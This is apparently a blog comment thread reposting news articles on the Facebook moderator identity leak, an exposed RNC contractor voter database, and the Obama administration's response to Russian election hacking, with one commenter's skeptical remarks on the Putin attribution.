    The moderator who went into hiding was among hundreds of “community operations analysts” contracted by global outsourcing company Cpl Recruitment. Community operations analysts are typically low-paid contractors tasked with policing Facebook for content that breaches its community standards.

    Overwhelmed with fear that he could face retaliation, the moderator, who first came to Ireland as an asylum seeker when he was a child, quit his job and moved to eastern Europe for five months.

    “It was getting too dangerous to stay in Dublin,” he said, explaining that his family had already experienced the horrifying impact of terrorism: his father had been kidnapped and beaten and his uncle executed in Iraq.

    “The only reason we’re in Ireland was to escape terrorism and threats,” he said.

    The moderator said that others within the high-risk six had their personal profiles viewed by accounts with ties to Isis, Hezbollah and the Kurdistan Workers Party. Facebook complies with the US state department’s designation of terrorist groups.

    “When you come from a war zone and you have people like that knowing your family name you know that people get butchered for that,” he said. “The punishment from Isis for working in counter-terrorism is beheading. All they’d need to do is tell someone who is radical here.”

    Facebook moderators like him first suspected there was a problem when they started receiving friend requests from people affiliated with the terrorist organizations they were scrutinizing.
    An urgent investigation by Facebook’s security team established that personal profiles belonging to content moderators had been exposed. As soon as the leak was identified in November 2016, Facebook convened a “task force of data scientists, community operations and security investigators”, according to internal emails seen by the Guardian, and warned all the employees and contracted staff it believed were affected. The company also set-up an email address, nameleak@fb.com, to field queries from those affected.

    Facebook then discovered that the personal Facebook profiles of its moderators had been automatically appearing in the activity logs of the groups they were shutting down.

    Craig D’Souza, Facebook’s head of global investigations, liaised directly with some of the affected contractors, talking to the six individuals considered to be at the highest risk over video conference, email and Facebook Messenger.

    In one exchange, before the Facebook investigation was complete, D’Souza sought to reassure the moderators that there was “a good chance” any suspected terrorists notified about their identity would fail to connect the dots.

    “Keep in mind that when the person sees your name on the list, it was in their activity log, which contains a lot of information,” D’Souza wrote, “there is a good chance that they associate you with another admin of the group or a hacker …”

    “I understand Craig,” replied the moderator who ended up fleeing Ireland, “but this is taking chances. I’m not waiting for a pipe bomb to be mailed to my address until Facebook does something about it.”

    The bug in the software was not fixed for another two weeks, on 16 November 2016. By that point the glitch had been active for a month. However, the bug was also retroactively exposing the personal profiles of moderators who had censored accounts as far back as August 2016.

    Facebook offered to install a home alarm monitoring system and provide transport to and from work to those in the high risk group. The company also offered counseling through Facebook’s employee assistance program, over and above counseling offered by the contractor, Cpl.

    The moderator who fled Ireland was unsatisfied with the security assurances received from Facebook. In an email to D’Souza, he wrote that the high-risk six had spent weeks “in a state of panic and emergency” and that Facebook needed to do more to “address our pressing concerns for our safety and our families”.
    He told the Guardian that the five months he spent in eastern Europe felt like “exile”. He kept a low profile, relying on savings to support himself. He spent his time keeping fit and liaising with his lawyer and the Dublin police, who checked up on his family while he was away. He returned to Ireland last month after running out of money, although he still lives in fear.

    “I don’t have a job, I have anxiety and I’m on antidepressants,” he said. “I can’t walk anywhere without looking back.”

    This month he filed a legal claim against Facebook and Cpl with the Injuries Board in Dublin. He is seeking compensation for the psychological damage caused by the leak.

    Cpl did not respond to a request to comment. The statement provided by Facebook said its investigation sought to determine “exactly which names were possibly viewed and by whom, as well as an assessment of the risk to the affected person”.

    The social media giant played down the threat posed to the affected moderators, but said that it contacted each of them individually “to offer support, answer their questions, and take meaningful steps to ensure their safety”.

    “Our investigation found that only a small fraction of the names were likely viewed, and we never had evidence of any threat to the people impacted or their families as a result of this matter,” the spokesman said.

    Details of Facebook’s security blunder will once again put a spotlight on the grueling and controversial work carried out by an army of thousands of low-paid staff, including in countries like the Philippines and India.
    0:00
    The Guardian recently revealed the secret rules and guidelines Facebook uses to train moderators to police its vast network of almost two billion users, including 100 internal training manuals, spreadsheets and flowcharts.

    The moderator who fled Ireland worked for a 40-strong specialist team tasked with investigating reports of terrorist activity on Facebook. He was hired because he spoke Arabic, he said.

    He felt that contracted staff were not treated as equals to Facebook employees but “second-class citizens”. He was paid just €13 ($15) per hour for a role that required him to develop specialist knowledge of global terror networks and scour through often highly-disturbing material.

    “You come in every morning and just look at beheadings, people getting butchered, stoned, executed,” he said.

    Facebook’s policies allow users to post extremely violent images provided they don’t promote or celebrate terrorism. This means moderators may be repeatedly exposed to the same haunting pictures to determine whether the people sharing them were condemning or celebrating the depicted acts.

    The moderator said that when he started, he was given just two weeks training and was required to use his personal Facebook account to log into the social media giant’s moderation system.
    “They should have let us use fake profiles,” he said, adding: “They never warned us that something like this could happen.”

    Facebook told the Guardian that as a result of the leak it is testing the use of administrative accounts that are not linked to personal profiles.

    Moderation teams were continually scored for the accuracy and speed of their decisions, he said, as well as other factors such as their ability to stay updated training materials. If a moderator’s score dropped below 90% they would receive a formal warning.
    In an attempt to boost morale among agency staff, Facebook launched a monthly award ceremony to celebrate the top quality performers. The prize was a Facebook-branded mug. “The mug that all Facebook employees get,” he noted.

    Contact the author: olivia.solon@theguardian.com

    Posted by Michelle Zucker | June 21, 2017, 6:52 pm
  9. This article from “The Hill” expresses concern because an RNC database was not secure in an Amazon cloud server. The question not asked is why does the RNC need files of invormation addressing 46 issues for nearly 200 Million Americans. The most important paragraphs from the article are these three:

    1. For example, a 50-gigabyte file of “Post Elect 2016” information, last updated in mid-January, contained modeled data about a voter’s likely positions on 46 different issues ranging from “how likely it is the individual voted for Obama in 2012, whether they agree with the Trump foreign policy of ‘America First’ and how likely they are to be concerned with auto manufacturing as an issue, among others.”
    2. According to Ad Age, the RNC spent $983,000 between January 2015 and November 2016 for Deep Root’s services and $4.2 million for TargetPoint’s.
    3. The Deep Root Analytics exposure contains information on more than half of the American population.

    http://thehill.com/policy/cybersecurity/338383-data-on-198-million-us-voters-left-exposed-to-the-internet-by-rnc-data

    Data on 198M voters exposed by GOP contractor
    BY JOE UCHILL – 06/19/17 09:00 AM EDT
    Fullscreen
    A data analytics contractor employed by the Republican National Committee (RNC) left databases containing information on nearly 200 million potential voters exposed to the internet without security, allowing anyone who knew where to look to download it without a password. 

    “We take full responsibility for this situation,” said the contractor, Deep Root Analytics, in a statement.  

    The databases were part of 25 terabytes of files contained in an Amazon cloud account that could be browsed without logging in. The account was discovered by researcher Chris Vickery of the security firm UpGuard. The files have since been secured. 

    Vickery is a prominent researcher in uncovering improperly secured files online. But, he said, this exposure is of a magnitude he has never seen before
     
    “In terms of the disc space used, this is the biggest exposure I’ve found. In terms of the scope and depth, this is the biggest one I’ve found,” said Vickery. 
    The accessible files, according to UpGuard, contain a main 198 million-entry database with names, addresses of voters and an “RNC ID” that can be used with other exposed files to research individuals.

    For example, a 50-gigabyte file of “Post Elect 2016” information, last updated in mid-January, contained modeled data about a voter’s likely positions on 46 different issues ranging from “how likely it is the individual voted for Obama in 2012, whether they agree with the Trump foreign policy of ‘America First’ and how likely they are to be concerned with auto manufacturing as an issue, among others.”

    That file appears in a folder titled “target_point,” an apparent reference to another firm contracted by the RNC to crunch data. UpGuard speculates that the folder may imply that the firm TargetPoint compiled and shared the data with Deep Root. Another folder appears to reference Data Trust, another contracted firm. 

    UpGuard analyst Dan O’Sullivan looked himself up in the database and writes in the official report that the calculated preferences were, at least for him, right on the money. 

    “It is a testament both to their talents, and to the real danger of this exposure, that the results were astoundingly accurate,” he said. 

    The Deep Root Analytics cloud server had 25 terabytes of data exposed, including 1.1 terabytes available for download. 

    Over the 2016 election season, the RNC was a major client of Deep Root, one of a handful firms it contacted for big data analysis. Firms like Deep Root Analytics use data from a variety of sources to extrapolate social and political preferences of voters to determine how best to market to them. 

    According to Ad Age, the RNC spent $983,000 between January 2015 and November 2016 for Deep Root’s services and $4.2 million for TargetPoint’s. 

    “Deep Root Analytics builds voter models to help enhance advertiser understanding of TV viewership. The data accessed was not built for or used by any specific client. It is our proprietary analysis to help inform local television ad buying,” said Deep Root Analytics in their statement. 
    Misconfigured cloud servers and online databases are a common way for data to be accidentally left exposed to the public. Vickery has found everything from military engineering plans to databases of believed terrorists in exactly this way.

    What is uncommon in this case is the size and scope of this exposure. If its records are accurate, the Deep Root Analytics exposure contains information on more than half of the American population. It dwarfs the second-largest exposure of voter information — 93.4 million records of Mexican citizens — by more than 100 million voters and tops the largest data breach of voter information — 55 million records of Philippine voters — by more than 140 million. 

    Anyone who knew the files’ web address could have accessed them. But without that knowledge, they are much harder to find. Even armed with a search for unsecured databases, finding exposures of any magnitude is tough work. Vickery sifts through a large number of unsecured databases to find ones that interesting enough to publish research.

    Deep Root has contracted the security firm Stroz Friedberg to perform a thorough investigation of the exposure.]

    The exposure, between June 1 and June 14, was sealed shut shortly after Vickery made the discovery during the night of June 12 and notified relevant regulatory bodies. 

    Posted by Michelle Zucker | June 21, 2017, 7:00 pm
  10. @Michelle Zucker–

    Pterrafractyl contributed this information, plus some additional, edifying points that you might want to peruse.

    Best,

    Dave

    Posted by Dave Emory | June 21, 2017, 7:42 pm
  11. The Washington Post has a big new piece on US’s investigation into the 2016 election hacks that contains a number of interesting revelations, both in terms of how the US government came to the . And overall, perhaps the biggest revelations is how little the technical evidence of the hack had to do with the final conclusion that the Russian government was behind the attacks. Instead, it sounds like that conclusion was based on a CIA source in the Kremlin. And even when that intelligence was delivered other agencies weren’t ready to accept the CIA’s conclusion and it took intelligence from another nation (not named) to provide the final intelligence tipping point that led to a broad-based conclusion the not only was the Russian government behind the cyberattacks but that Vladimir Putin himself ordered it. And that ally’s intelligence is described as “the most critical technical intelligence on Russia” and the NSA still wasn’t convinced based on what sounds like a lack of confidence in that source. So it looks like a CIA Kremlin source and an unnamed foreign intelligence agency with questionable credentials are the basis of what appears to be a likely future full-scale US/Russian cyberwar.

    Beyond that, the piece describes the fears of those top US officials examining this issue over the summer of 2016 and it sounds like many were concerned that the DNC hacks really were just a warm up to a much broader full-scale cyberwar against the US election that would have included hacking the election systems and disrupting the vote. So that gives is a sense of the mindset (or at least projected mindset) of top government officials: at least some were convince that Putin was so pissed off at the prospect of Hillary Clinton becoming President that he was willing to launch a cyberwar. A cyberwar that would undoubtedly provoke a serious response and obviously be very difficult to contain.

    Finally, the piece ends with a description what appears to be the most significant US response to the alleged Russian government role in the hacks: the US has already planted a number of ‘cyberbombs’ on Russian networks intended to be very painful if used and capable of being remotely triggered in response to a future Russian cyberattack. It could be an attack on the US electrical grid or a future election. But those ‘cyberbombs’ are apparently being put in place now and the order has been given to trigger them in the future without a presidential order. Unless Donald Trump rescinds that order.

    So based on a CIA Kremlin source and the intelligence from a mystery ally the US is openly planting retaliatory cyberbombs on Russian networks. What could possibly go wrong:

    The Washington Post

    Obama’s secret struggle to punish Russia for Putin’s election assault

    By Greg Miller, Ellen Nakashima and Adam Entous
    June 23, 2017

    Early last August, an envelope with extraordinary handling restrictions arrived at the White House. Sent by courier from the CIA, it carried “eyes only” instructions that its contents be shown to just four people: President Barack Obama and three senior aides.

    Inside was an intelligence bombshell, a report drawn from sourcing deep inside the Russian government that detailed Russian President Vladimir Putin’s direct involvement in a cyber campaign to disrupt and discredit the U.S. presidential race.

    But it went further. The intelligence captured Putin’s specific instructions on the operation’s audacious objectives — defeat or at least damage the Democratic nominee, Hillary Clinton, and help elect her opponent, Donald Trump.

    At that point, the outlines of the Russian assault on the U.S. election were increasingly apparent. Hackers with ties to Russian intelligence services had been rummaging through Democratic Party computer networks, as well as some Republican systems, for more than a year. In July, the FBI had opened an investigation of contacts between Russian officials and Trump associates. And on July 22, nearly 20,000 emails stolen from the Democratic National Committee were dumped online by WikiLeaks.

    But at the highest levels of government, among those responsible for managing the crisis, the first moment of true foreboding about Russia’s intentions arrived with that CIA intelligence.

    The material was so sensitive that CIA Director John Brennan kept it out of the President’s Daily Brief, concerned that even that restricted report’s distribution was too broad. The CIA package came with instructions that it be returned immediately after it was read. To guard against leaks, subsequent meetings in the Situation Room followed the same protocols as planning sessions for the Osama bin Laden raid.

    It took time for other parts of the intelligence community to endorse the CIA’s view. Only in the administration’s final weeks in office did it tell the public, in a declassified report, what officials had learned from Brennan in August — that Putin was working to elect Trump.

    Over that five-month interval, the Obama administration secretly debated dozens of options for deterring or punishing Russia, including cyberattacks on Russian infrastructure, the release of CIA-gathered material that might embarrass Putin and sanctions that officials said could “crater” the Russian economy.

    But in the end, in late December, Obama approved a modest package combining measures that had been drawn up to punish Russia for other issues — expulsions of 35 diplomats and the closure of two Russian compounds — with economic sanctions so narrowly targeted that even those who helped design them describe their impact as largely symbolic.

    Obama also approved a previously undisclosed covert measure that authorized planting cyber weapons in Russia’s infrastructure, the digital equivalent of bombs that could be detonated if the United States found itself in an escalating exchange with Moscow. The project, which Obama approved in a covert-action finding, was still in its planning stages when Obama left office. It would be up to President Trump to decide whether to use the capability.

    In political terms, Russia’s interference was the crime of the century, an unprecedented and largely successful destabilizing attack on American democracy. It was a case that took almost no time to solve, traced to the Kremlin through cyber-forensics and intelligence on Putin’s involvement. And yet, because of the divergent ways Obama and Trump have handled the matter, Moscow appears unlikely to face proportionate consequences.

    Those closest to Obama defend the administration’s response to Russia’s meddling. They note that by August it was too late to prevent the transfer to WikiLeaks and other groups of the troves of emails that would spill out in the ensuing months. They believe that a series of warnings — including one that Obama delivered to Putin in September — prompted Moscow to abandon any plans of further aggression, such as sabotage of U.S. voting systems.

    Denis McDonough, who served as Obama’s chief of staff, said that the administration regarded Russia’s interference as an attack on the “heart of our system.”

    “We set out from a first-order principle that required us to defend the integrity of the vote,” McDonough said in an interview. “Importantly, we did that. It’s also important to establish what happened and what they attempted to do so as to ensure that we take the steps necessary to stop it from happening again.”

    But other administration officials look back on the Russia period with remorse.

    “It is the hardest thing about my entire time in government to defend,” said a former senior Obama administration official involved in White House deliberations on Russia. “I feel like we sort of choked.”

    This account of the Obama administration’s response to Russia’s interference is based on interviews with more than three dozen current and former U.S. officials in senior positions in government, including at the White House, the State, Defense and Homeland Security departments, and U.S. intelligence services. Most agreed to speak only on the condition of anonymity, citing the sensitivity of the issue.

    The White House, the CIA, the FBI, the National Security Agency and the Office of the Director of National Intelligence declined to comment.

    ‘Deeply concerned’

    The CIA breakthrough came at a stage of the presidential campaign when Trump had secured the GOP nomination but was still regarded as a distant long shot. Clinton held comfortable leads in major polls, and Obama expected that he would be transferring power to someone who had served in his Cabinet.

    The intelligence on Putin was extraordinary on multiple levels, including as a feat of espionage.

    For spy agencies, gaining insights into the intentions of foreign leaders is among the highest priorities. But Putin is a remarkably elusive target. A former KGB officer, he takes extreme precautions to guard against surveillance, rarely communicating by phone or computer, always running sensitive state business from deep within the confines of the Kremlin.

    The Washington Post is withholding some details of the intelligence at the request of the U.S. government.

    In early August, Brennan alerted senior White House officials to the Putin intelligence, making a call to deputy national security adviser Avril Haines and pulling national security adviser Susan E. Rice aside after a meeting before briefing Obama along with Rice, Haines and McDonough in the Oval Office.

    Officials described the president’s reaction as grave. Obama “was deeply concerned and wanted as much information as fast as possible,” a former official said. “He wanted the entire intelligence community all over this.”

    Concerns about Russian interference had gathered throughout the summer.

    Russia experts had begun to see a troubling pattern of propaganda in which fictitious news stories, assumed to be generated by Moscow, proliferated across social-media platforms.

    Officials at the State Department and FBI became alarmed by an unusual spike in requests from Russia for temporary visas for officials with technical skills seeking permission to enter the United States for short-term assignments at Russian facilities. At the FBI’s behest, the State Department delayed approving the visas until after the election.

    Meanwhile, the FBI was tracking a flurry of hacking activity against U.S. political parties, think tanks and other targets. Russia had gained entry to DNC systems in the summer of 2015 and spring of 2016, but the breaches did not become public until they were disclosed in a June 2016 report by The Post.

    Even after the late-July WikiLeaks dump, which came on the eve of the Democratic convention and led to the resignation of Rep. Debbie Wasserman Schultz (D-Fla.) as the DNC’s chairwoman, U.S. intelligence officials continued to express uncertainty about who was behind the hacks or why they were carried out.

    At a public security conference in Aspen, Colo., in late July, Director of National Intelligence James R. Clapper Jr. noted that Russia had a long history of meddling in American elections but that U.S. spy agencies were not ready to “make the call on attribution” for what was happening in 2016.

    “We don’t know enough … to ascribe motivation,” Clapper said. “Was this just to stir up trouble or was this ultimately to try to influence an election?”

    Brennan convened a secret task force at CIA headquarters composed of several dozen analysts and officers from the CIA, the NSA and the FBI.

    The unit functioned as a sealed compartment, its work hidden from the rest of the intelligence community. Those brought in signed new non-disclosure agreements to be granted access to intelligence from all three participating agencies.

    They worked exclusively for two groups of “customers,” officials said. The first was Obama and fewer than 14 senior officials in government. The second was a team of operations specialists at the CIA, NSA and FBI who took direction from the task force on where to aim their subsequent efforts to collect more intelligence on Russia.

    Don’t make things worse

    The secrecy extended into the White House.

    Rice, Haines and White House homeland-security adviser Lisa Monaco convened meetings in the Situation Room to weigh the mounting evidence of Russian interference and generate options for how to respond. At first, only four senior security officials were allowed to attend: Brennan, Clapper, Attorney General Loretta E. Lynch and FBI Director James B. Comey. Aides ordinarily allowed entry as “plus-ones” were barred.

    Gradually, the circle widened to include Vice President Biden and others. Agendas sent to Cabinet secretaries — including John F. Kerry at the State Department and Ashton B. Carter at the Pentagon — arrived in envelopes that subordinates were not supposed to open. Sometimes the agendas were withheld until participants had taken their seats in the Situation Room.

    Throughout his presidency, Obama’s approach to national security challenges was deliberate and cautious. He came into office seeking to end wars in Iraq and Afghanistan. He was loath to act without support from allies overseas and firm political footing at home. He was drawn only reluctantly into foreign crises, such as the civil war in Syria, that presented no clear exit for the United States.

    Obama’s approach often seemed reducible to a single imperative: Don’t make things worse. As brazen as the Russian attacks on the election seemed, Obama and his top advisers feared that things could get far worse.

    They were concerned that any pre-election response could provoke an escalation from Putin. Moscow’s meddling to that point was seen as deeply concerning but unlikely to materially affect the outcome of the election. Far more worrisome to the Obama team was the prospect of a cyber-assault on voting systems before and on Election Day.

    They also worried that any action they took would be perceived as political interference in an already volatile campaign. By August, Trump was predicting that the election would be rigged. Obama officials feared providing fuel to such claims, playing into Russia’s efforts to discredit the outcome and potentially contaminating the expected Clinton triumph.

    Before departing for an August vacation to Martha’s Vineyard, Obama instructed aides to pursue ways to deter Moscow and proceed along three main paths: Get a high-confidence assessment from U.S. intelligence agencies on Russia’s role and intent; shore up any vulnerabilities in state-run election systems; and seek bipartisan support from congressional leaders for a statement condemning Moscow and urging states to accept federal help.

    The administration encountered obstacles at every turn.

    Despite the intelligence the CIA had produced, other agencies were slower to endorse a conclusion that Putin was personally directing the operation and wanted to help Trump. “It was definitely compelling, but it was not definitive,” said one senior administration official. “We needed more.”

    Some of the most critical technical intelligence on Russia came from another country, officials said. Because of the source of the material, the NSA was reluctant to view it with high confidence.

    Brennan moved swiftly to schedule private briefings with congressional leaders. But getting appointments with certain Republicans proved difficult, officials said, and it was not until after Labor Day that Brennan had reached all members of the “Gang of Eight” — the majority and minority leaders of both houses and the chairmen and ranking Democrats on the Senate and House intelligence committees.

    Jeh Johnson, the homeland-security secretary, was responsible for finding out whether the government could quickly shore up the security of the nation’s archaic patchwork of voting systems. He floated the idea of designating state mechanisms “critical infrastructure,” a label that would have entitled states to receive priority in federal cybersecurity assistance, putting them on a par with U.S. defense contractors and financial networks.

    On Aug. 15, Johnson arranged a conference call with dozens of state officials, hoping to enlist their support. He ran into a wall of resistance.

    The reaction “ranged from neutral to negative,” Johnson said in congressional testimony Wednesday.

    Brian Kemp, the Republican secretary of state of Georgia, used the call to denounce Johnson’s proposal as an assault on state rights. “I think it was a politically calculated move by the previous administration,” Kemp said in a recent interview, adding that he remains unconvinced that Russia waged a campaign to disrupt the 2016 race. “I don’t necessarily believe that,” he said.

    Stung by the reaction, the White House turned to Congress for help, hoping that a bipartisan appeal to states would be more effective.

    In early September, Johnson, Comey and Monaco arrived on Capitol Hill in a caravan of black SUVs for a meeting with 12 key members of Congress, including the leadership of both parties.

    The meeting devolved into a partisan squabble.

    “The Dems were, ‘Hey, we have to tell the public,’?” recalled one participant. But Republicans resisted, arguing that to warn the public that the election was under attack would further Russia’s aim of sapping confidence in the system.

    Senate Majority Leader Mitch McConnell (R-Ky.) went further, officials said, voicing skepticism that the underlying intelligence truly supported the White House’s claims. Through a spokeswoman, McConnell declined to comment, citing the secrecy of that meeting.

    Key Democrats were stunned by the GOP response and exasperated that the White House seemed willing to let Republican opposition block any pre-election move.

    On Sept. 22, two California Democrats — Sen. Dianne Feinstein and Rep. Adam B. Schiff — did what they couldn’t get the White House to do. They issued a statement making clear that they had learned from intelligence briefings that Russia was directing a campaign to undermine the election, but they stopped short of saying to what end.

    A week later, McConnell and other congressional leaders issued a cautious statement that encouraged state election officials to ensure their networks were “secure from attack.” The release made no mention of Russia and emphasized that the lawmakers “would oppose any effort by the federal government” to encroach on the states’ authorities.

    When U.S. spy agencies reached unanimous agreement in late September that the interference was a Russian operation directed by Putin, Obama directed spy chiefs to prepare a public statement summarizing the intelligence in broad strokes.

    With Obama still determined to avoid any appearance of politics, the statement would not carry his signature.

    On Oct. 7, the administration offered its first public comment on Russia’s “active measures,” in a three-paragraph statement issued by Johnson and Clapper. Comey had initially agreed to attach his name, as well, officials said, but changed his mind at the last minute, saying that it was too close to the election for the bureau to be involved.

    “The U.S. intelligence community is confident that the Russian government directed the recent compromises of e-mails from U.S. persons and institutions, including from U.S. political organizations,” the statement said. “We believe, based on the scope and sensitivity of these efforts, that only Russia’s senior-most officials could have authorized these activities.”

    Early drafts accused Putin by name, but the reference was removed out of concern that it might endanger intelligence sources and methods.

    The statement was issued around 3:30 p.m., timed for maximum media coverage. Instead, it was quickly drowned out. At 4 p.m., The Post published a story about crude comments Trump had made about women that were captured on an “Access Hollywood” tape. Half an hour later, WikiLeaks published its first batch of emails stolen from Clinton campaign chairman John Podesta.

    ‘Ample time’ after election

    The Situation Room is actually a complex of secure spaces in the basement level of the West Wing. A video feed from the main room courses through some National Security Council offices, allowing senior aides sitting at their desks to see — but not hear — when meetings are underway.

    As the Russia-related sessions with Cabinet members began in August, the video feed was shut off. The last time that had happened on a sustained basis, officials said, was in the spring of 2011 during the run-up to the U.S. Special Operations raid on bin Laden’s compound in Pakistan.

    The blacked-out screens were seen as an ominous sign among lower-level White House officials who were largely kept in the dark about the Russia deliberations even as they were tasked with generating options for retaliation against Moscow.

    Much of that work was led by the Cyber Response Group, an NSC unit with representatives from the CIA, NSA, State Department and Pentagon.

    The early options they discussed were ambitious. They looked at sectorwide economic sanctions and cyberattacks that would take Russian networks temporarily offline. One official informally suggested — though never formally proposed — moving a U.S. naval carrier group into the Baltic Sea as a symbol of resolve.

    What those lower-level officials did not know was that the principals and their deputies had by late September all but ruled out any pre-election retaliation against Moscow. They feared that any action would be seen as political and that Putin, motivated by a seething resentment of Clinton, was prepared to go beyond fake news and email dumps.

    The FBI had detected suspected Russian attempts to penetrate election systems in 21 states, and at least one senior White House official assumed that Moscow would try all 50, officials said. Some officials believed the attempts were meant to be detected to unnerve the Americans. The patchwork nature of the United States’ 3,000 or so voting jurisdictions would make it hard for Russia to swing the outcome, but Moscow could still sow chaos.

    “We turned to other scenarios” the Russians might attempt, said Michael Daniel, who was cybersecurity coordinator at the White House, “such as disrupting the voter rolls, deleting every 10th voter [from registries] or flipping two digits in everybody’s address.”

    The White House also worried that they had not yet seen the worst of Russia’s campaign. WikiLeaks and DCLeaks, a website set up in June 2016 by hackers believed to be Russian operatives, already had troves of emails. But U.S. officials feared that Russia had more explosive material or was willing to fabricate it.

    “Our primary interest in August, September and October was to prevent them from doing the max they could do,” said a senior administration official. “We made the judgment that we had ample time after the election, regardless of outcome, for punitive measures.”

    The assumption that Clinton would win contributed to the lack of urgency.

    Instead, the administration issued a series of warnings.

    Brennan delivered the first on Aug. 4 in a blunt phone call with Alexander Bortnikov, the director of the FSB, Russia’s powerful security service.

    A month later, Obama confronted Putin directly during a meeting of world leaders in Hangzhou, China. Accompanied only by interpreters, Obama told Putin that “we knew what he was doing and [he] better stop or else,” according to a senior aide who subsequently spoke with Obama. Putin responded by demanding proof and accusing the United States of interfering in Russia’s internal affairs.

    In a subsequent news conference, Obama alluded to the exchange and issued a veiled threat. “We’re moving into a new era here where a number of countries have significant capacities,” he said. “Frankly, we’ve got more capacity than anybody both offensively and defensively.”

    There were at least two other warnings.

    On Oct. 7, the day that the Clapper-Johnson statement was released, Rice summoned Russian Ambassador Sergey Kislyak Sergey Kislyak to the White House and handed him a message to relay to Putin.

    Then, on Oct. 31, the administration delivered a final pre-election message via a secure channel to Moscow originally created to avert a nuclear exchange. The message noted that the United States had detected malicious activity, originating from servers in Russia, targeting U.S. election systems and warned that meddling would be regarded as unacceptable interference. Russia confirmed the next day that it had received the message but replied only after the election through the same channel, denying the accusation.

    As Election Day approached, proponents of taking action against Russia made final, futile appeals to Obama’s top aides: McDonough, Rice and Haines. Because their offices were part of a suite of spaces in the West Wing, securing their support on any national security issue came to be known as “moving the suite.”

    One of the last to try before the election was Kerry. Often perceived as reluctant to confront Russia, in part to preserve his attempts to negotiate a Syria peace deal, Kerry was at critical moments one of the leading hawks.

    In October, Kerry’s top aides had produced an “action memo” that included a package of retaliatory measures including economic sanctions. Knowing the White House was not willing to act before the election, the plan called for the measures to be announced almost immediately after votes had been securely cast and counted.

    Kerry signed the memo and urged the White House to convene a principals meeting to discuss the plan, officials said. “The response was basically, ‘Not now,’” one official said.

    Election Day arrived without penalty for Moscow.

    A U.S. cyber-weapon

    The most difficult measure to evaluate is one that Obama alluded to in only the most oblique fashion when announcing the U.S. response.

    “We will continue to take a variety of actions at a time and place of our choosing, some of which will not be publicized,” he said in a statement released by the White House.

    He was referring, in part, to a cyber operation that was designed to be detected by Moscow but not cause significant damage, officials said. The operation, which entailed implanting computer code in sensitive computer systems that Russia was bound to find, served only as a reminder to Moscow of the United States’ cyber reach.

    But Obama also signed the secret finding, officials said, authorizing a new covert program involving the NSA, CIA and U.S. Cyber Command.

    Obama declined to comment for this article, but a spokesman issued a statement: “This situation was taken extremely seriously, as is evident by President Obama raising this issue directly with President Putin; 17 intelligence agencies issuing an extraordinary public statement; our homeland security officials working relentlessly to bolster the cyber defenses of voting infrastructure around the country; the President directing a comprehensive intelligence review, and ultimately issuing a robust response including shutting down two Russian compounds, sanctioning nine Russian entities and individuals, and ejecting 35 Russian diplomats from the country.”

    The cyber operation is still in its early stages and involves deploying “implants” in Russian networks deemed “important to the adversary and that would cause them pain and discomfort if they were disrupted,” a former U.S. official said.

    The implants were developed by the NSA and designed so that they could be triggered remotely as part of retaliatory cyber-strike in the face of Russian aggression, whether an attack on a power grid or interference in a future presidential race.

    Officials familiar with the measures said that there was concern among some in the administration that the damage caused by the implants could be difficult to contain.

    As a result, the administration requested a legal review, which concluded that the devices could be controlled well enough that their deployment would be considered “proportional” in varying scenarios of Russian provocation, a requirement under international law.

    The operation was described as long-term, taking months to position the implants and requiring maintenance thereafter. Under the rules of covert action, Obama’s signature was all that was necessary to set the operation in motion.

    U.S. intelligence agencies do not need further approval from Trump, and officials said that he would have to issue a countermanding order to stop it. The officials said that they have seen no indication that Trump has done so.

    ———-

    “Obama’s secret struggle to punish Russia for Putin’s election assault” by Greg Miller, Ellen Nakashima and Adam Entous; The Washington Post; 06/23/2017

    “Inside was an intelligence bombshell, a report drawn from sourcing deep inside the Russian government that detailed Russian President Vladimir Putin’s direct involvement in a cyber campaign to disrupt and discredit the U.S. presidential race.”

    So a CIA deep Russian government source is the primary source of the ‘Putin ordered it’ conclusion. Well, at least that’s better than the bad joke technical evidence that’s been provided thus far. But even that source’s claims apparently weren’t enough to convinced other parts of the intelligence community. It took the intelligence from the unnamed ally to do that:


    But it went further. The intelligence captured Putin’s specific instructions on the operation’s audacious objectives — defeat or at least damage the Democratic nominee, Hillary Clinton, and help elect her opponent, Donald Trump.

    At that point, the outlines of the Russian assault on the U.S. election were increasingly apparent. Hackers with ties to Russian intelligence services had been rummaging through Democratic Party computer networks, as well as some Republican systems, for more than a year. In July, the FBI had opened an investigation of contacts between Russian officials and Trump associates. And on July 22, nearly 20,000 emails stolen from the Democratic National Committee were dumped online by WikiLeaks.

    But at the highest levels of government, among those responsible for managing the crisis, the first moment of true foreboding about Russia’s intentions arrived with that CIA intelligence.

    It took time for other parts of the intelligence community to endorse the CIA’s view. Only in the administration’s final weeks in office did it tell the public, in a declassified report, what officials had learned from Brennan in August — that Putin was working to elect Trump.

    Despite the intelligence the CIA had produced, other agencies were slower to endorse a conclusion that Putin was personally directing the operation and wanted to help Trump. “It was definitely compelling, but it was not definitive,” said one senior administration official. “We needed more.”

    Some of the most critical technical intelligence on Russia came from another country, officials said. Because of the source of the material, the NSA was reluctant to view it with high confidence.

    “Some of the most critical technical intelligence on Russia came from another country, officials said. Because of the source of the material, the NSA was reluctant to view it with high confidence.”

    That sure sounds like a ‘slam dunk’ case. And not the good kind. And based on these intelligence sources, the US is openly planting retaliatory cyberbombs on Russian networks:


    But Obama also signed the secret finding, officials said, authorizing a new covert program involving the NSA, CIA and U.S. Cyber Command.

    The cyber operation is still in its early stages and involves deploying “implants” in Russian networks deemed “important to the adversary and that would cause them pain and discomfort if they were disrupted,” a former U.S. official said.

    The implants were developed by the NSA and designed so that they could be triggered remotely as part of retaliatory cyber-strike in the face of Russian aggression, whether an attack on a power grid or interference in a future presidential race.

    Officials familiar with the measures said that there was concern among some in the administration that the damage caused by the implants could be difficult to contain.

    As a result, the administration requested a legal review, which concluded that the devices could be controlled well enough that their deployment would be considered “proportional” in varying scenarios of Russian provocation, a requirement under international law.

    The operation was described as long-term, taking months to position the implants and requiring maintenance thereafter. Under the rules of covert action, Obama’s signature was all that was necessary to set the operation in motion.

    U.S. intelligence agencies do not need further approval from Trump, and officials said that he would have to issue a countermanding order to stop it. The officials said that they have seen no indication that Trump has done so.

    Keep in mind that such a response from the US would be entirely predictable if the Russian government really did order this hack attack. Russia would be at a heightened risk for years or decades to come if Putin really did order this attack and there’s no reason to assume that the Russian government wouldn’t be well aware of this consequence. So if Putin really did order this hack he would have to have gone insane. That’s how stupid this attack was if Putin actually ordered it. But according to a CIA spy in the Kremlin, along with a questionable foreign ally, that’s exactly what Putin did. Because he apparently went insane and preemptively launched a cyberwar knowing full well how devastating the long-term consequences could be. Because he really, really, really hates Hillary. That’s the narrative we’re being given.

